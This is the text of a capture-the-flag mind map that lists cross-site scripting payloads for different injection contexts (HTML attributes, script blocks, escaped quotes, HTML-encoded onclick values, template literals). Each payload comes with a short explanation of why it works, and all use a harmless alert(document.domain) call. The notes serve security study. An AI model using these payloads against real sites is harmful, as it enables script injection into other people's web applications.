Please enable JavaScript.
Coggle requires JavaScript to display documents.
CTF (URL (Path (index enumerate, change path /edit if dont have read…
CTF
-
Input field
Common
XSS payload
-
-
-
Contexts
-
in HTML Tag Attributes
-
if > is blocked or encoded, use this instead: " autofocus onfocus=alert(document.domain) x="
-
in Javascript
context: <script>var input = 'controllable data here';</script>
=> payload: </script><img src=1 onerror=alert(document.domain)>
Explain: The reason this works is that the browser first performs HTML parsing to identify the page elements including blocks of script, and only later performs JavaScript parsing to understand and execute the embedded scripts. The above payload leaves the original script broken, with an unterminated string literal. But that doesn't prevent the subsequent script being parsed and executed in the normal way.
-
escaping any single quote characters with a backslash:
input: \';alert(document.domain)//
output: \\';alert(document.domain)//
make use of HTML-encoding:
context: <a href="#" onclick="... var input='controllable data here'; ...">
=> payload: & apos;-alert(document.domain)-& apos; (no space between & and apos)
explain: The browser HTML-decodes the value of the onclick attribute before the JavaScript is interpreted, the entities are decoded as quotes, which become string delimiters, and so the attack succeeds.
javascript template literals:
context: <script>var input = backtick controllable data here backtick;</script>
=> payload: ${alert(document.domain)}
-
-
-
-
-